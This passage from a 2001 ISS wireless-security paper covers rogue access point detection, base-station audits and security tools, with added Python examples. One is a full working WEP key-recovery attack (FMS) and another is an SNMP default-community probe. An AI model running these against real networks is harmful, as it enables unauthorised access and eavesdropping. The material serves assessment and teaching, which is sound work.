many OS fingerprinting technologies use this method for
identifying the OS type. This concept can be applied to the base
stations.
* From a wireless network search, an organization can identify these
rogue base stations by setting up a 2.4 GHz sniffer that captures
802.11 frames from the air. By looking at the packets, you may find
the IP addresses in use, which helps identify which network the base
station is bridged into. In a densely populated area with many
businesses close together, the sniffer may pick up not only the
intended organization's traffic but also that of a close neighboring
company, so the addresses seen must be checked against the
organization's own ranges.
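One way to do this triage, as an added example that is not part of the original paper: parse unencrypted 802.11 data frames, take the BSSID according to the ToDS/FromDS bits, pull the IPv4 addresses out of the LLC/SNAP payload, and flag any base station that is not on the approved list but carries addresses from the organization's own subnets. The MAC addresses, IP addresses, subnets and frames below are constructed for the example.

```python
import ipaddress
import struct

# Added example, not from the paper: minimal 802.11 data-frame parser that
# maps BSSIDs to the IPv4 addresses carried over them. All addresses and
# subnets are constructed for illustration.

TYPE_DATA = 2
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")   # LLC/SNAP header, EtherType 0x0800

def mac(s):
    return bytes.fromhex(s.replace(":", ""))

def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)

def build_data_frame(to_ds, from_ds, addr1, addr2, addr3, src_ip, dst_ip, wep=False):
    """Constructed 802.11 data frame (24-byte header) carrying a bare IPv4 header."""
    flags = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x40 if wep else 0)
    fc = bytes([TYPE_DATA << 2, flags])               # frame control: type=data, subtype=0
    hdr = fc + b"\x00\x00" + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 17, 0,
                     ipaddress.IPv4Address(src_ip).packed,
                     ipaddress.IPv4Address(dst_ip).packed)
    return hdr + LLC_SNAP_IPV4 + ip

def bssid_of(flags, addr1, addr2, addr3):
    """Which address field holds the BSSID depends on the ToDS/FromDS bits."""
    to_ds, from_ds = flags & 0x01, flags & 0x02
    if not to_ds and not from_ds:
        return addr3                 # IBSS / ad-hoc: BSSID is address 3
    if to_ds and not from_ds:
        return addr1                 # station -> AP: BSSID is address 1
    if from_ds and not to_ds:
        return addr2                 # AP -> station: BSSID is address 2
    return None                      # WDS (four addresses): not handled here

def parse_frame(frame):
    """Return (bssid, src_ip, dst_ip) for a plaintext IPv4 data frame, else None."""
    if len(frame) < 24:
        return None
    fc0, flags = frame[0], frame[1]
    if (fc0 >> 2) & 0x03 != TYPE_DATA:
        return None
    if flags & 0x40:
        return None                  # WEP bit set: payload is ciphertext, skip it
    bssid = bssid_of(flags, frame[4:10], frame[10:16], frame[16:22])
    if bssid is None:
        return None
    body = frame[24:]
    if not body.startswith(LLC_SNAP_IPV4):
        return None
    ip = body[len(LLC_SNAP_IPV4):]
    if len(ip) < 20 or ip[0] >> 4 != 4:
        return None
    return (fmt_mac(bssid),
            str(ipaddress.IPv4Address(ip[12:16])),
            str(ipaddress.IPv4Address(ip[16:20])))

def survey(frames):
    """Map every BSSID seen to the set of IPv4 addresses carried over it."""
    seen = {}
    for f in frames:
        r = parse_frame(f)
        if r:
            seen.setdefault(r[0], set()).update(r[1:])
    return seen

def rogue_candidates(seen, corporate_nets, approved=()):
    """Unapproved BSSIDs whose traffic uses the organization's own address ranges."""
    nets = [ipaddress.ip_network(n) for n in corporate_nets]
    return sorted(b for b, ips in seen.items() if b not in approved
                  and any(ipaddress.ip_address(i) in n for i in ips for n in nets))

# Constructed capture: a station on an unknown AP bridged into 10.1.0.0/16, a
# neighbouring cafe AP on 192.168.1.0/24, and a WEP frame from the sanctioned AP.
CORPORATE_NETS = ["10.1.0.0/16"]
APPROVED_BSSIDS = {"00:40:96:11:22:33"}
SAMPLE_FRAMES = [
    build_data_frame(True, False, "00:02:2d:aa:bb:cc", "00:02:2d:12:34:56",
                     "00:50:da:01:02:03", "10.1.20.55", "10.1.1.10"),
    build_data_frame(False, True, "00:02:2d:12:34:56", "00:02:2d:aa:bb:cc",
                     "00:50:da:01:02:03", "10.1.1.10", "10.1.20.55"),
    build_data_frame(True, False, "00:90:4b:ca:fe:01", "00:90:4b:00:00:02",
                     "00:90:4b:00:00:01", "192.168.1.23", "192.168.1.1"),
    build_data_frame(True, False, "00:40:96:11:22:33", "00:40:96:00:00:09",
                     "00:50:da:01:02:03", "10.1.30.7", "10.1.1.10", wep=True),
]

if __name__ == "__main__":
    report = survey(SAMPLE_FRAMES)
    for bssid, ips in report.items():
        print(bssid, sorted(ips))
    print("rogue candidates:", rogue_candidates(report, CORPORATE_NETS, APPROVED_BSSIDS))
```

The cafe AP shows up in the survey but is not flagged, because its addresses are not in the organization's ranges; the sanctioned AP's WEP frames are skipped rather than misread as plaintext.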
[3.5] Base Station Security Assessments
An organization can examine and analyze the base station
configuration. A security audit and assessment can determine whether
the passwords and SNMP community strings are still at their default
or easily guessed values, and whether the stronger security modes,
such as encryption, have been enabled.
With router ACLs and firewall rules, an organization can minimize
access to the SNMP agents and other management interfaces on the base
station. A security assessment can determine how widely the base
stations' configuration interfaces are reachable from within the
organization.
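A concrete form of the default-community check, as an added example (not code from the paper or from ISS): a small SNMPv1 encoder and decoder that sends a GetRequest for sysDescr.0 under each candidate community string and records which ones the agent answers. The list of candidate communities and the sample response are assumptions constructed for the example.

```python
import socket
import struct

# Added example, not from the paper or ISS: SNMPv1 GetRequest builder and
# GetResponse parser, used to test a base station's agent for default
# community strings. DEFAULT_COMMUNITIES is an assumed list.

DEFAULT_COMMUNITIES = ["public", "private", "admin", "write"]   # assumed common defaults
SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)                        # sysDescr.0

def ber_len(n):
    """BER length: short form below 128, two-byte long form otherwise."""
    return bytes([n]) if n < 128 else b"\x82" + struct.pack("!H", n)

def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload

def ber_int(v):
    """Non-negative INTEGER; the extra leading zero keeps the sign bit clear."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def ber_oid(oid):
    body = bytes([40 * oid[0] + oid[1]])
    for arc in oid[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, (arc & 0x7F) | 0x80)   # base-128 with continuation bits
            arc >>= 7
        body += bytes(chunk)
    return tlv(0x06, body)

def build_get_request(community, oid=SYS_DESCR_0, request_id=1):
    """SNMPv1 GetRequest for one OID (version field 0 means SNMPv1)."""
    varbind = tlv(0x30, ber_oid(oid) + b"\x05\x00")                 # OID, NULL value
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def read_tlv(buf, pos=0):
    """Return (tag, value, position after the TLV)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def parse_get_response(msg):
    """Return (community, error_status, value) from an SNMPv1 GetResponse, or None."""
    tag, body, _ = read_tlv(msg)
    if tag != 0x30:
        return None
    _, _version, p = read_tlv(body)
    _, community, p = read_tlv(body, p)
    tag, pdu, _ = read_tlv(body, p)
    if tag != 0xA2:                                # GetResponse PDU
        return None
    _, _reqid, p = read_tlv(pdu)
    _, err, p = read_tlv(pdu, p)
    _, _index, p = read_tlv(pdu, p)
    _, vblist, _ = read_tlv(pdu, p)
    _, vb, _ = read_tlv(vblist)
    _, _oid, p = read_tlv(vb)
    _, value, _ = read_tlv(vb, p)
    return community.decode(errors="replace"), int.from_bytes(err, "big"), value

def build_get_response(community, value, request_id=1, error_status=0):
    """Constructed GetResponse, used here only as offline sample input."""
    varbind = tlv(0x30, ber_oid(SYS_DESCR_0) + tlv(0x04, value))
    pdu = tlv(0xA2, ber_int(request_id) + ber_int(error_status) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def probe_communities(host, communities=DEFAULT_COMMUNITIES, port=161, timeout=1.0):
    """Community strings the agent at host answers with error-status 0. Needs
    network reachability to the base station; use only on equipment you are
    authorised to assess."""
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i, c in enumerate(communities, 1):
            s.sendto(build_get_request(c, request_id=i), (host, port))
            try:
                data, _ = s.recvfrom(2048)
            except socket.timeout:
                continue                           # v1 agents silently drop bad communities
            r = parse_get_response(data)
            if r and r[0] == c and r[1] == 0:
                hits.append(c)
    return hits

if __name__ == "__main__":
    print(build_get_request("public").hex())
    print(parse_get_response(build_get_response("public", b"Sample AP firmware 1.0")))
```

Any community that answers is a finding; "private" answering is worse, since a write community lets an attacker change the configuration. Running the probe from outside the management VLAN also tells you whether the ACLs and firewall rules the section recommends actually limit who can reach the agent.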
[3.6] Wireless Client Protection
The wireless clients should be assessed for having the following
security technologies:
* firecell (distributed personal firewalls) - lock down who can gain
access to the client.
* VPN - adds another layer of encryption and authentication beyond
what 802.11 can provide.
* intrusion detection - identify and minimize attacks from
intruders, worms, viruses, Trojans and backdoors.
* desktop scanning - identify security misconfigurations on the
client.
[4] Who is making 802.11 Security Solutions?
[4.1] 802.11 Gateway Infrastructure
* BlueSocket: The WG-1000 Wireless Gateway(TM) offers a single
scalable solution to the security, quality of service (QoS) and
management issues facing enterprises and service providers that
deploy wireless LANs based on the IEEE 802.11b and Bluetooth(TM)
standards.
* EcuTel: Viatores Secure WLAN edition is different from legacy
virtual private networks (VPNs) in that it maintains VPN and
application sessions uninterrupted with no configuration or
re-boot required. Viatores combines two advanced protocols for
mobility and security to enable roaming from LANs to WLANs and
between WLAN subnets seamlessly and securely. Application sessions
and security tunnels are maintained while the user moves from one
subnet to another. Roaming users can communicate easily with
colleagues, regardless of where they are or how they are
connected, because Viatores maintains a single network address.
Viatores Secure WLAN edition includes:
+ Industry-strength secure communication well beyond the WEP
standard;
+ Seamless roaming from wired to wireless networks and between
different wireless networks;
+ Support for two-way, peer-to-peer communication;
+ Data confidentiality and integrity, including key exchanges,
digital signatures, and industry-strength encryption;
+ Option to upgrade to secure and seamless roaming from public
networks.
* NetMotion Wireless - NetMotion Mobility provides a VPN designed to
work with WLAN security.
http://www.netmotionwireless.com/resource/whitepapers/netmotion_security.asp
has an overview of wireless security and how NetMotion Mobility(TM)
prevents unauthorized users from accessing your system and stops
eavesdropping, replay, and other network-level attacks.
[4.2] 802.11 Security Analysis Tools
* AirSnort is a wireless LAN (WLAN) tool that recovers WEP encryption
keys. It operates by passively monitoring transmissions and computes
the key once enough packets with weak IVs have been gathered.
AirSnort works against both 40-bit and 128-bit WEP.
+ http://freshmeat.net/projects/airsnort/
+ http://www.dachb0den.com/projects/bsd-airtools.html
* WEPCrack is a tool that cracks 802.11 WEP encryption keys using the
recently published weakness in the RC4 key scheduling algorithm
(the Fluhrer, Mantin and Shamir attack).
+ http://sourceforge.net/projects/wepcrack
* Network Stumbler scans for networks roughly every second and logs
all the networks it runs into, including the real SSIDs, the AP's
MAC address, the best signal-to-noise ratio encountered, and the
time you crossed into the network's space. If you add a GPS
receiver to the notebook, it logs the latitude and longitude of
the AP. Network Stumbler does not use promiscuous mode; it relies on
the access point answering its probes, so simply turning off
broadcast pings (the AP's response to broadcast probe requests)
hides the access point from NetStumbler. The NetStumbler website now
also includes MiniStumbler for the PocketPC.
+ http://www.netstumbler.com/
+ http://www.netstumbler.com/download.php?op=getit&lid=21 (PocketPC MiniStumbler)
* Internet Scanner 6.2, the market-leading network vulnerability
assessment tool, was the first to include many 802.11b security
checks. The 802.11 checks are in several X-Press Updates (XPU 4.9 and
4.10). It assesses access points over the wired network by contacting
their management interface.
* Wireless Scanner 1.0 is designed to look for security issues via the
802.11b airwaves. It has a penetration testing mode and a discovery
mode. It uses promiscuous mode and is therefore capable of capturing
the raw 802.11b packets for forensic analysis and replay. Even if
broadcast pings are turned off, Wireless Scanner will still catch an
Access Point as soon as it sends any kind of traffic, because it
listens promiscuously rather than relying on probe responses.
+ http://www.iss.net/download/ Evaluation copy of Wireless
Scanner.
+ https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/home.php
WS1.0 Knowledge Base
* RealSecure 6.0, the market-leading IDS, was the first to monitor
many 802.11b attacks. Make sure you are running the latest X-Press
Updates; the 802.11 checks for IDS arrived in XPU 3.1. It is
recommended to place IDS sensors behind the Access Point, directly on
any servers and desktops behind the access point, and on the wireless
clients themselves.
* BlackICE PC Protection 3.5, a personal firewall with IDS capability,
is used on wireless laptops and desktops to protect against
client-to-client attacks.
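The AirSnort and WEPCrack entries above both rest on the same RC4 key-scheduling weakness, so here is one worked model of it, added as an example that is not code from the paper, AirSnort or WEPCrack. It implements RC4 and WEP's IV-prefixed keying, then runs the Fluhrer-Mantin-Shamir (FMS) vote against a constructed 40-bit key: for weak IVs of the form (A+3, 255, X), the first keystream byte leaks secret key byte A with roughly 5% probability, and the first keystream byte is known because every 802.11 data payload begins with the LLC/SNAP byte 0xAA. The key, the IV set and the "capture" are constructed; the capture contains only the weak-IV packets an attacker would filter out of a real sniff.

```python
from collections import Counter

# Added example, not from the paper, AirSnort or WEPCrack: the FMS attack on
# WEP, run against a constructed 40-bit key and a constructed weak-IV capture.

def rc4_ksa(key):
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S

def rc4_stream(key, n):
    S, i, j, out = rc4_ksa(key), 0, 0, []
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(secret, iv, plaintext):
    """WEP: per-packet RC4 key is the 3-byte IV (sent in clear) followed by the secret."""
    ks = rc4_stream(iv + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

SNAP = bytes.fromhex("aaaa03")       # every 802.11 data payload starts with LLC/SNAP

def fms_candidate(iv, known, z1):
    """One vote for secret byte index len(known): run the KSA over the known prefix
    (IV + recovered bytes); if the state is 'resolved', the first keystream byte z1
    was placed by the swap at step A+3 and exposes the next key byte (~5% of the time)."""
    prefix, A = iv + known, len(known)
    S, j = list(range(256)), 0
    for i in range(A + 3):
        j = (j + S[i] + prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None                                    # IV is not weak for this byte
    return (S.index(z1) - j - S[A + 3]) & 0xFF

def recover_key(packets, keylen, depth=4):
    """packets: (iv, first three ciphertext bytes). Vote byte by byte, backtracking over
    the 'depth' best candidates, and accept a key only if it decrypts the SNAP header."""
    def verify(key):
        return all(wep_encrypt(key, iv, SNAP) == ct for iv, ct in packets[:8])

    def search(known):
        if len(known) == keylen:
            return known if verify(known) else None
        votes = Counter()
        for iv, ct in packets:
            cand = fms_candidate(iv, known, ct[0] ^ SNAP[0])   # z1 = c1 XOR 0xAA
            if cand is not None:
                votes[cand] += 1
        for byte, _ in votes.most_common(depth):
            found = search(known + bytes([byte]))
            if found is not None:
                return found
        return None

    return search(b"")

SECRET = bytes.fromhex("0badc0ffee")        # constructed 40-bit key to be recovered

def capture(secret):
    """Constructed weak-IV capture: for each key byte A, the IVs (A+3, 255, X)."""
    pkts = []
    for A in range(len(secret)):
        for x in range(256):
            iv = bytes([A + 3, 255, x])
            pkts.append((iv, wep_encrypt(secret, iv, SNAP)))
    return pkts

if __name__ == "__main__":
    print("recovered:", recover_key(capture(SECRET), len(SECRET)).hex())
```

The point for an assessor: the weakness is in how WEP builds per-packet keys, so a longer key only means more bytes to vote on, and the attack is entirely passive, which is why the paper treats WEP as insufficient on its own and pushes VPNs and per-client protection on top of it.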
[5] About Internet Security Systems' Wireless 802.11b Solution
ISS offers a comprehensive wireless security solution:
* Wireless Security Assessments and Penetration Testing
* Wireless Policy Design and Workshops
* Vulnerability Scanning with specific 802.11 configuration checks
* Intrusion Detection for Wireless LAN networks
* Wireless 802.11 Security Classes
* ISS X-Force Advisories:
+ http://xforce.iss.net/alerts/advise83.php 802.11 SNMP Auth.
Flaw
+ http://xforce.iss.net/alerts/advise84.php WEP Key exposed via
SNMP
Copyright © 2001, Internet Security Systems. All rights reserved.
This document may be redistributed only in its entirety with version
date, authorship notice, and acknowledgements intact. No part of it
may be sold for profit or incorporated in a commercial document
without the permission of the copyright holder. Permission will be
granted for complete electronic copies to be made available as an
archive or mirror service on the condition that the author be notified
and that the copy be kept up to date. This document is provided as is
without any express or implied warranty.
****
Christopher W. Klaus
Founder and CTO
Internet Security Systems
Email: cwkpublic@iss.net